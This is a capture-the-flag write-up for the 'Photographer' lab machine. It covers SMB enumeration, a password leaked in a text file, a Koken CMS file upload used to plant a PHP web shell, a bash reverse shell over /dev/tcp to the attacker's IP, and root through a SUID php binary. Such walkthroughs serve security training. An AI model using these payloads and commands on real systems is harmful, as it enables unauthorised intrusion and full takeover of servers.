Photographer - OSPG
Summary of Result
With a valid credetials acquired from SMB service, we attain the initial foothold by exploiting the Authenticated Remote Code Execution (RCE) of the vulnerable Koken CMS. We then escalate our privilege by abusing a misconfigured SUID binary and successfully compromise root access.
Enumeration
Nmap
We’ll begin with a nmap scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCq9GoYsvJTOUcsgHSES9+20Ix4Q8wjm5slMheJ2ME+COokAqxBzXSr458KBmHv3bsTLWAH9FxoXJ6zrzDPmPApcqVifB4aI9l/VYxoeJCj54kKIQlCKkWTZjsAeLBI2Lk2+yJLLFWPTAZ2htwRAwCl
9z8YV3xgtqhTa+5BqIm/GInW4PYV0zi9zOMn2g4jNSWvy91FBUboGLwVgNYslGBydNW8Fhz8X/LXHZ1x6ulA76W026VEGOiQfoiIi84IFi9CbP8GIKfQ7BHuDlMqgiN9+w7K0z0oFdtiFhAS/48w89MYn6UOzw7Aaa9eLQi0+zxpW5SpCpw0mC2euzPxow
2Z
| 256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMz4UG2gfu7L/Lxcqek1pZf46d8SocbES1A2a/XUYQgTmIqJuCEpLf3ERgVXS+7Lwdi6+F3xkI/lYFCA5MkRUQA=
| 256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDL5ZwzA5dpqtWx4ZzjVQ6NMzVUia8/We8txfiAn+mv4
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
→ There are a few running services. Within the scope of this writeup, we are interested in the SMB/445 and HTTP/8000 services.
SMB Enumeration
Let’s us start listing shares utilizing smbclient without providing password.
$ smbclient -L $IP
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
From the result, we discover that anonymous access is available for the sambashare share.
Let’s us further drop an interactive shell in the sambashare by running the following command.
$ smbclient \\\\$IP\\sambashare
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 20 11:51:08 2020
.. D 0 Thu Aug 20 12:08:59 2020
mailsent.txt N 503 Mon Jul 20 21:29:40 2020
wordpress.bkp.zip N 13930308 Mon Jul 20 21:22:23 2020
3300080 blocks of size 1024. 2958792 blocks available
There are two files: mailsent.txt and wordpress.bkp.zip. To download them, from the SMB shell, we continue executing.
...
3300080 blocks of size 1024. 2958792 blocks available
smb: \> mget *
Get file mailsent.txt? y
getting file \mailsent.txt of size 503 as mailsent.txt (245.6 KiloBytes/sec) (average 245.6 KiloBytes/sec)
Get file wordpress.bkp.zip? y
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (183835.1 KiloBytes/sec) (average 179004.0 KiloBytes/sec)
After those files are downloaded, let’s us inspect the content of mailsent.txt.
$ cat mailsent.txt
...
To: Daisa Ahomi <daisa@photographer.com>
...
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Here are some important info that we might notice:
→ Potential email: daisa@photographer.com.
→ Potential user: daisa.
→ Potential pass: babygirl.
HTTP/8000
Now, let’s us gather some hidden directories of the web application.
This can be done with ffuf.
$ ffuf -u http://$IP:8000/FUZZ -w common.txt
admin [Status: 301, Size: 321, Words: 20, Lines: 10]
app [Status: 301, Size: 319, Words: 20, Lines: 10]
index.php [Status: 200, Size: 4603, Words: 206, Lines: 95]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
storage [Status: 301, Size: 323, Words: 20, Lines: 10]
admin appears to be compelling, navigate to the site, we discover that it’s running Koken CMS 0.22.24.
$ curl -s http://192.168.57.76:8000/admin/
...
<title>Koken</title>
<link rel="stylesheet" href="css/console_0.22.24.min.css" />
...
Conducting a few additional researches, the Koken CMS is known to be vulnerable to Authenticated Arbitrary File Upload.
$ searchsploit koken
----------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) | php/webapps/48706.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Koken CMS RCE
Following the steps in the PoC, we first need to authenticate as the admin user with the credentials that we’ve obtained earlier - daisa@photographer.com:babygirl.
[1]. Create a malicious .php.jpg file with the following contents.
$ cat image.php.jpg
<?php system($_GET['cmd']);?>
[2]. From the Koken CMS Dashboard:
Click on
Import Contentin theLibrarytab → importimage.php.jpg→ intercept the request withBurp.Rename the file to
image.php.Forwardthe request.
The final payload might look like the following.
POST /api.php?/content HTTP/1.1
Host: 192.168.57.76:8000
...
-----------------------------392967243522561067211768914619
Content-Disposition: form-data; name="name"
image.php
...
-----------------------------392967243522561067211768914619
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg
<?php system(['cmd']); ?>
-----------------------------392967243522561067211768914619--
[3]. In the similar Dashboard, hover the mouse on Download File to inspect the uploaded link location.
If file is uploaded properly, we can pull a reverse shell using the below command.
$ curl -s http://192.168.57.76:8000/storage/originals/1e/26/image.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.57.200%2F80%200%3E%261%27
Our nc should catch the reverse shell at port 80 as www-data.
$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.57.200] from (UNKNOWN) [192.168.57.76] 37502
bash: cannot set terminal process group (1383): Inappropriate ioctl for device
bash: no job control in this shell
www-data@photographer:/var/www/html/koken/storage/originals/1e/26$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege Escalation
Misconfigured SUID Binary
Locally navigate around the system divulges a misconfigured SUID binary that ends up privilege escalation.
www-data@photographer:/var/www$ find / -perm -u=s -exec ls -al {} \; 2>/dev/null
<www$ find / -perm -u=s -exec ls -al {} \; 2>/dev/null
...
-rwsr-xr-x 1 root root 4883680 Jul 9 2020 /usr/bin/php7.2
...
With the www-data shell, we execute
www-data@photographer:/var/www$ /usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"
root@photographer:/var/www# whoami
root
and successfully compromise root!.